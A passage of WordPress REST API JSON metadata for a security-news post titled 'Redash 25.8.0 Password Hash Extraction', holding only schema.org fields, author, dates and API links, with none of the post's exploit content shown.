Extraction_PACKETSTORM:215802","datePublished":"2026-02-18T12:49:59+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41411"},"wordCount":2036,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41411#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41411","url":"https:\/\/zero.redgem.net\/?p=41411","name":"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:59+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41411#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41411"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41411#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Redash 25.8.0 Password Hash Extraction_PACKETSTORM:215802"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41411"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41411\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}